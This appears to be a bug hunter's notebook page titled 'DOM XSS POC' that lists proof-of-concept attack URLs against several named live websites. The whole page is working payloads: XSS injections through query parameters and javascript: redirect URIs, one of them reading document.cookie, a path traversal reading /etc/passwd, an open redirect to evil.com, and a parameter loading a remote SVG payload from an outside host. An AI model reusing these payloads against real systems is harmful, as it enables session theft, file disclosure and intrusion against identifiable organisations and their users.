DOM XSS POC

-----------------------------------------------------------

Site-1: www.pcmmod.com

https://www.pcmmod.com/jersey/image?id=1
https://www.pcmmod.com/ressources/components/api/dowloadFileTmpToZip.php?tempFilePath=/etc/passwd

-----------------------------------------------------------

Site-2: www.dekrantvantoen.nl

https://www.dekrantvantoen.nl//vw/article.do?id=LC-18240921-1005&vw=org&lm=%22%3E%3Cimg%20src=x%20onerror=confirm(origin)%3E&v2=true

-----------------------------------------------------------

Site-3: www.ppra.org.pk

https://www.ppra.org.pk/atn_org.asp?orgid=458&orgname=%22%3E%3Cimg%20src=x%20onerror=confirm(origin)%3E&PageNo=1

-----------------------------------------------------------

Site-4: surveys.dal.ca

https://surveys.dal.ca/opinio/admin/help/en/index.htm?page=https://evil.com
https://surveys.dal.ca/opinio/admin/help/en/index.htm?page=javascript:alert(origin)
https://surveys.dal.ca/opinio/admin/help/en/index.htm?page=https://x55.is/brutelogic/poc.svg

-----------------------------------------------------------

Site-4: dutchwebhosting.nl

https://dutchwebhosting.nl/handleidingen/plesk-onyx-quick-start/index.htm?fileName=javascript:alert(origin)

-----------------------------------------------------------

Site-5: account.cbg.nl

https://account.cbg.nl/logout?redirect_uri=javascript:alert(origin)
https://account.cbg.nl/authorize?client_id=uxldyanLQuz7rp1V44BaSsU0&redirect_uri=javascript:alert(document.cookie)/

-----------------------------------------------------------

Site-6: lms.ue.edu.pk

http://lms.ue.edu.pk/WebTop/Home.aspx?body=javascript:alert(document.cookie)
PreviousImproper Access ControlNextTemplate

Last updated